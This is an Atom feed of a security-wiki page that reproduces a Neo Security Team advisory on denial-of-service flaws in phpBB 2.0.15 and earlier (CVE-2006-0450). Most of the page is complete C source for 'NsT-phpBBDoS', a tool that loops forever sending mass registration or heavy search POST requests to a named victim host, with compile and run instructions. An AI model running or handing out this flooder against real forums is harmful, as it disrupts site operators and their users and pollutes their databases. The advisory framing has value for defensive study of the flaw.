<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2006-0450_phpBB_2.0.19%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2006-0450 phpBB 2.0.19拒絕服務漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2006-0450_phpBB_2.0.19%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2006-0450_phpBB_2.0.19%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-08T06:00:08Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2006-0450_phpBB_2.0.19%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=827&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==INFO== &lt;pre&gt; -------------------------------------------------------- [N]eo [S]ecurity [T]eam [NST]® - Advisory #15 - 00/00/06 ---------------------------------------------...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2006-0450_phpBB_2.0.19%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=827&amp;oldid=prev"/>
		<updated>2021-04-01T02:41:44Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==INFO== &amp;lt;pre&amp;gt; -------------------------------------------------------- [N]eo [S]ecurity [T]eam [NST]® - Advisory #15 - 00/00/06 ---------------------------------------------...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==INFO==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
--------------------------------------------------------&lt;br /&gt;
[N]eo [S]ecurity [T]eam [NST]® - Advisory #15 - 00/00/06&lt;br /&gt;
--------------------------------------------------------&lt;br /&gt;
Program:  phpBB 2.0.15&lt;br /&gt;
&lt;br /&gt;
Homepage:  http://www.phpbb.com&lt;br /&gt;
&lt;br /&gt;
Vulnerable Versions: phpBB 2.0.15 &amp;amp; Lower versions&lt;br /&gt;
&lt;br /&gt;
Risk: High Risk!!&lt;br /&gt;
&lt;br /&gt;
Impact: Multiple DoS Vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
---------------------------------------------------------&lt;br /&gt;
- Description&lt;br /&gt;
---------------------------------------------------------&lt;br /&gt;
phpBB is a high powered, fully scalable, and highly customizable&lt;br /&gt;
Open Source bulletin board package. phpBB has a user-friendly&lt;br /&gt;
interface, simple and straightforward administration panel, and&lt;br /&gt;
helpful FAQ. Based on the powerful PHP server language and your&lt;br /&gt;
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,&lt;br /&gt;
phpBB is the ideal free community solution for all web sites.&lt;br /&gt;
- Tested&lt;br /&gt;
---------------------------------------------------------&lt;br /&gt;
localhost &amp;amp; many forums&lt;br /&gt;
- Explotation&lt;br /&gt;
---------------------------------------------------------&lt;br /&gt;
profile.php &amp;lt;&amp;lt; By registering as many users as you can.&lt;br /&gt;
search.php  &amp;lt;&amp;lt; by searching in a way that the db couln't observe it.&lt;br /&gt;
&lt;br /&gt;
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0450&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==NsT-phpBBDoS.c==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/*&lt;br /&gt;
--------------------------------------------------------&lt;br /&gt;
[N]eo [S]ecurity [T]eam [NST]® - Advisory #15 - 00/00/06&lt;br /&gt;
--------------------------------------------------------&lt;br /&gt;
Program:  phpBB 2.0.15&lt;br /&gt;
Homepage:  http://www.phpbb.com&lt;br /&gt;
Vulnerable Versions: phpBB 2.0.15 &amp;amp; Lower versions&lt;br /&gt;
Risk: High Risk!!&lt;br /&gt;
Impact: Multiple DoS Vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
    -==phpBB 2.0.15 Multiple DoS Vulnerabilities==-&lt;br /&gt;
---------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
- Description&lt;br /&gt;
---------------------------------------------------------&lt;br /&gt;
phpBB is a high powered, fully scalable, and highly customizable&lt;br /&gt;
Open Source bulletin board package. phpBB has a user-friendly&lt;br /&gt;
interface, simple and straightforward administration panel, and&lt;br /&gt;
helpful FAQ. Based on the powerful PHP server language and your&lt;br /&gt;
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,&lt;br /&gt;
phpBB is the ideal free community solution for all web sites.&lt;br /&gt;
&lt;br /&gt;
- Tested&lt;br /&gt;
---------------------------------------------------------&lt;br /&gt;
localhost &amp;amp; many forums&lt;br /&gt;
&lt;br /&gt;
- Explotation&lt;br /&gt;
---------------------------------------------------------&lt;br /&gt;
profile.php &amp;lt;&amp;lt; By registering as many users as you can.&lt;br /&gt;
search.php  &amp;lt;&amp;lt; by searching in a way that the db couln't observe it.&lt;br /&gt;
&lt;br /&gt;
- Exploit&lt;br /&gt;
---------------------------------------------------------&lt;br /&gt;
[C Source]&lt;br /&gt;
&lt;br /&gt;
  Name: NsT-phpBBDoS&lt;br /&gt;
  Copyright: NeoSecurityteam&lt;br /&gt;
  Author: HaCkZaTaN&lt;br /&gt;
  Date: 19/06/05&lt;br /&gt;
  Description: xD You must figure out the problem xD&lt;br /&gt;
  &lt;br /&gt;
  root@NeoSecurity:/home/hackzatan# pico NsT-phpBBDoS.c&lt;br /&gt;
  root@NeoSecurity:/home/hackzatan# gcc NsT-phpBBDoS.c -o NsT-phpBBDoS&lt;br /&gt;
  root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS&lt;br /&gt;
  [+] NsT-phpBBDoS v0.1 by HaCkZaTaN&lt;br /&gt;
  [+] NeoSecurityTeam&lt;br /&gt;
  [+] Dos has begun....[+]&lt;br /&gt;
  &lt;br /&gt;
  [*] Use: ./NsT-phpBBDoS &amp;lt;path&amp;gt; &amp;lt;search.php or profile.php&amp;gt; &amp;lt;Host&amp;gt;&lt;br /&gt;
  [*] Example: ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com&lt;br /&gt;
  root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com&lt;br /&gt;
  [+] NsT-phpBBDoS v0.1 by HaCkZaTaN&lt;br /&gt;
  [+] NeoSecurityTeam&lt;br /&gt;
  [+] Dos has begun....[+]&lt;br /&gt;
  &lt;br /&gt;
  .................................&lt;br /&gt;
  root@NeoSecurity:/home/hackzatan# echo &amp;quot;Let see how many users I have created&amp;quot;&lt;br /&gt;
  root@NeoSecurity:/home/hackzatan# set | grep MACHTYPE&lt;br /&gt;
  MACHTYPE=i486-slackware-linux-gnu&lt;br /&gt;
  root@NeoSecurity:/home/hackzatan#&lt;br /&gt;
&lt;br /&gt;
*/&lt;br /&gt;
&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
#include &amp;lt;ctype.h&amp;gt;&lt;br /&gt;
#include &amp;lt;errno.h&amp;gt;&lt;br /&gt;
#ifdef WIN32&lt;br /&gt;
#include &amp;lt;winsock2.h&amp;gt;&lt;br /&gt;
#pragma comment(lib, &amp;quot;ws2_32&amp;quot;)&lt;br /&gt;
#pragma pack(1)&lt;br /&gt;
#define WIN32_LEAN_AND_MEAN&lt;br /&gt;
#else&lt;br /&gt;
#include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
#include &amp;lt;sys/types.h&amp;gt;&lt;br /&gt;
#include &amp;lt;sys/socket.h&amp;gt;&lt;br /&gt;
#include &amp;lt;netinet/in.h&amp;gt;&lt;br /&gt;
#include &amp;lt;arpa/inet.h&amp;gt;&lt;br /&gt;
#include &amp;lt;netdb.h&amp;gt;&lt;br /&gt;
#endif&lt;br /&gt;
&lt;br /&gt;
#define __USE_GNU&lt;br /&gt;
#define _XOPEN_SOURCE&lt;br /&gt;
&lt;br /&gt;
int Connection(char *, int);&lt;br /&gt;
void Write_In(int , char *, char *a, char *, int);&lt;br /&gt;
char Use(char *);&lt;br /&gt;
&lt;br /&gt;
int main(int argc, char *argv[])&lt;br /&gt;
{&lt;br /&gt;
    int sock, x = 0;&lt;br /&gt;
    char *Path = argv[1], *Pro_Sea = argv[2], *Host = argv[3];&lt;br /&gt;
&lt;br /&gt;
    puts(&amp;quot;[+] NsT-phpBBDoS v0.1 by HaCkZaTaN&amp;quot;);&lt;br /&gt;
    puts(&amp;quot;[+] NeoSecurityTeam&amp;quot;);&lt;br /&gt;
    puts(&amp;quot;[+] Dos has begun....[+]\n&amp;quot;);&lt;br /&gt;
    fflush(stdout);&lt;br /&gt;
&lt;br /&gt;
    if(argc != 4) Use(argv[0]);&lt;br /&gt;
&lt;br /&gt;
    while(1)&lt;br /&gt;
    {&lt;br /&gt;
           sock = Connection(Host,80);&lt;br /&gt;
           Write_In(sock, Path, Pro_Sea, Host, x);&lt;br /&gt;
           #ifndef WIN32&lt;br /&gt;
           shutdown(sock, SHUT_WR);&lt;br /&gt;
           close(sock);&lt;br /&gt;
           #else&lt;br /&gt;
           closesocket(sock);&lt;br /&gt;
           WSACleanup();&lt;br /&gt;
           #endif&lt;br /&gt;
           Pro_Sea = argv[2];&lt;br /&gt;
           x++;&lt;br /&gt;
    }&lt;br /&gt;
    //I don't think that it will get here =) &lt;br /&gt;
&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
int Connection(char *Host, int Port)&lt;br /&gt;
{&lt;br /&gt;
        #ifndef WIN32&lt;br /&gt;
        #define SOCKET int&lt;br /&gt;
        #define INVALID_SOCKET -1&lt;br /&gt;
        #else&lt;br /&gt;
        int error;&lt;br /&gt;
        WSADATA wsadata;&lt;br /&gt;
        error = WSAStartup(MAKEWORD(2, 2), &amp;amp;wsadata);&lt;br /&gt;
&lt;br /&gt;
        if (error == SOCKET_ERROR)&lt;br /&gt;
        {&lt;br /&gt;
                  perror(&amp;quot;Could Not Start Up Winsock!\n&amp;quot;);&lt;br /&gt;
                  return 0;&lt;br /&gt;
        }&lt;br /&gt;
&lt;br /&gt;
        #endif&lt;br /&gt;
&lt;br /&gt;
        SOCKET sockfd;&lt;br /&gt;
        struct sockaddr_in sin;&lt;br /&gt;
        struct in_addr  *myaddr;&lt;br /&gt;
        struct hostent *h;&lt;br /&gt;
        &lt;br /&gt;
        if(Port &amp;lt;= 0 || Port &amp;gt; 65535)&lt;br /&gt;
         {&lt;br /&gt;
                  puts(&amp;quot;[-] Invalid Port Number\n&amp;quot;);&lt;br /&gt;
                  fflush(stdout);&lt;br /&gt;
                  exit(-1);&lt;br /&gt;
         }&lt;br /&gt;
        &lt;br /&gt;
        if((sockfd =  socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)&lt;br /&gt;
        {&lt;br /&gt;
                    perror(&amp;quot;socket() &amp;quot;);&lt;br /&gt;
                    fflush (stdout);&lt;br /&gt;
                    exit(-1);&lt;br /&gt;
        }&lt;br /&gt;
&lt;br /&gt;
        if(isalpha(Host[0]))&lt;br /&gt;
        {&lt;br /&gt;
           if((h = gethostbyname(Host)) == NULL)&lt;br /&gt;
           {&lt;br /&gt;
                     perror(&amp;quot;gethostbyname() &amp;quot;);&lt;br /&gt;
                     fflush (stdout);&lt;br /&gt;
                     exit(-1);&lt;br /&gt;
           }&lt;br /&gt;
        }&lt;br /&gt;
        else&lt;br /&gt;
        {&lt;br /&gt;
              myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));&lt;br /&gt;
              myaddr-&amp;gt;s_addr=inet_addr(Host);&lt;br /&gt;
              &lt;br /&gt;
              if((h = gethostbyaddr((char *) &amp;amp;myaddr, sizeof(myaddr), AF_INET)) != NULL)&lt;br /&gt;
              {&lt;br /&gt;
                     perror(&amp;quot;gethostbyaddr() &amp;quot;);&lt;br /&gt;
                     fflush (stdout);&lt;br /&gt;
                     exit(-1);&lt;br /&gt;
              }&lt;br /&gt;
        }&lt;br /&gt;
&lt;br /&gt;
        memset(&amp;amp;sin, 0, sizeof(sin));&lt;br /&gt;
        sin.sin_family = AF_INET;&lt;br /&gt;
        sin.sin_port = htons(Port);&lt;br /&gt;
        memcpy(&amp;amp;sin.sin_addr.s_addr, h-&amp;gt;h_addr_list[0], h-&amp;gt;h_length);&lt;br /&gt;
&lt;br /&gt;
        if(connect(sockfd, (struct sockaddr *)&amp;amp;sin, sizeof(struct sockaddr_in)) &amp;lt; 0)&lt;br /&gt;
        {&lt;br /&gt;
                     perror(&amp;quot;connect() &amp;quot;);&lt;br /&gt;
                     exit (-1);&lt;br /&gt;
        }&lt;br /&gt;
&lt;br /&gt;
        return sockfd;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
void Write_In(int sock, char *Path, char *Pro_Sea, char *Host, int x)&lt;br /&gt;
{&lt;br /&gt;
    char *str1 = (char *)malloc(4*BUFSIZ), *str2 = (char *)malloc(4*BUFSIZ);&lt;br /&gt;
    char *req0 = &amp;quot;User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\r\n&amp;quot;&lt;br /&gt;
                 &amp;quot;Accept: */*\r\n&amp;quot;&lt;br /&gt;
                 &amp;quot;Accept-Language: en-us\r\n&amp;quot;&lt;br /&gt;
                 &amp;quot;Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n&amp;quot;&lt;br /&gt;
                 &amp;quot;Accept encoding: gzip,deflate\r\n&amp;quot;&lt;br /&gt;
                 &amp;quot;Keep-Alive: 300\r\n&amp;quot;&lt;br /&gt;
                 &amp;quot;Proxy-Connection: keep-alive\r\n&amp;quot;&lt;br /&gt;
                 &amp;quot;Content-Type: application/x-www-form-urlencoded\r\n&amp;quot;&lt;br /&gt;
                 &amp;quot;Cache-Control: no-cache\r\n&amp;quot;&lt;br /&gt;
                 &amp;quot;Pragma: no-cache\r\n&amp;quot;;&lt;br /&gt;
    char *Profile = &amp;quot;%40neosecurityteam.net&amp;amp;new_password=0123456&amp;amp;password_confirm=0123456&amp;amp;icq=&amp;amp;aim=&amp;amp;msn=&amp;amp;yim=&amp;amp;website=&amp;amp;location=&amp;amp;occupation=&amp;amp;interests=&amp;amp;signature=&amp;amp;viewemail=0&amp;amp;hideonline=0&amp;amp;notifyreply=0&amp;amp;notifypm=1&amp;amp;popup_pm=1&amp;amp;attachsig=1&amp;amp;allowbbcode=1&amp;amp;allowhtml=0&amp;amp;allowsmilies=1&amp;amp;language=english&amp;amp;style=1&amp;amp;timezone=0&amp;amp;dateformat=D+M+d%2C+Y+g%3Ai+a&amp;amp;mode=register&amp;amp;agreed=true&amp;amp;coppa=0&amp;amp;submit=Submit\r\n&amp;quot;;&lt;br /&gt;
    char *Search  = &amp;quot;&amp;amp;search_terms=any&amp;amp;search_author=*&amp;amp;search_forum=-1&amp;amp;search_time=0&amp;amp;search_fields=all&amp;amp;search_cat=-1&amp;amp;sort_by=0&amp;amp;sort_dir=DESC&amp;amp;show_results=topics&amp;amp;return_chars=200\r\n&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
    if(strcmp(&amp;quot;profile.php&amp;quot;, Pro_Sea) == 0) sprintf(str1, &amp;quot;username=NsT__%d&amp;amp;email=NsT__%d%s&amp;quot;, x, x, Profile);&lt;br /&gt;
    else if(strcmp(&amp;quot;search.php&amp;quot;, Pro_Sea) == 0)&lt;br /&gt;
    {&lt;br /&gt;
               Pro_Sea = &amp;quot;search.php?mode=results&amp;quot;;&lt;br /&gt;
               sprintf(str1, &amp;quot;search_keywords=Hack%d%s&amp;quot;, x, Search);&lt;br /&gt;
    }&lt;br /&gt;
    else&lt;br /&gt;
    {&lt;br /&gt;
               puts(&amp;quot;Sorry. Try making the right choice&amp;quot;);&lt;br /&gt;
               exit(-1);&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    sprintf(str2, &amp;quot;POST %s%s HTTP/1.1\r\n&amp;quot;&lt;br /&gt;
                  &amp;quot;Host: %s\r\n&amp;quot;&lt;br /&gt;
                  &amp;quot;Referer: http://%s/\r\n%s&amp;quot;&lt;br /&gt;
                  &amp;quot;Content-Length: %d\r\n\r\n%s&amp;quot;, Path, Pro_Sea, Host, Host, req0, strlen(str1), str1);&lt;br /&gt;
          &lt;br /&gt;
    write(sock, str2, strlen(str2));&lt;br /&gt;
    write(1, &amp;quot;.&amp;quot;, 1);&lt;br /&gt;
    fflush(stdout);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
char Use(char *program)&lt;br /&gt;
{&lt;br /&gt;
	fprintf(stderr,&amp;quot;[*] Use: %s &amp;lt;path&amp;gt; &amp;lt;search.php or profile.php&amp;gt; &amp;lt;Host&amp;gt;\n&amp;quot;, program);&lt;br /&gt;
	fprintf(stderr,&amp;quot;[*] Example: %s /phpBB/ profile.php Victimshost.com\n&amp;quot;, program);&lt;br /&gt;
	fflush(stdout);&lt;br /&gt;
	exit(-1);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
/*&lt;br /&gt;
&lt;br /&gt;
@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@&lt;br /&gt;
'@@@@@''@@'@@@''''''''@@''@@@''@@&lt;br /&gt;
'@@'@@@@@@''@@@@@@@@@'''''@@@&lt;br /&gt;
'@@'''@@@@'''''''''@@@''''@@@&lt;br /&gt;
@@@@''''@@'@@@@@@@@@@''''@@@@@&lt;br /&gt;
&lt;br /&gt;
*/&lt;br /&gt;
&lt;br /&gt;
/* EOF */&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>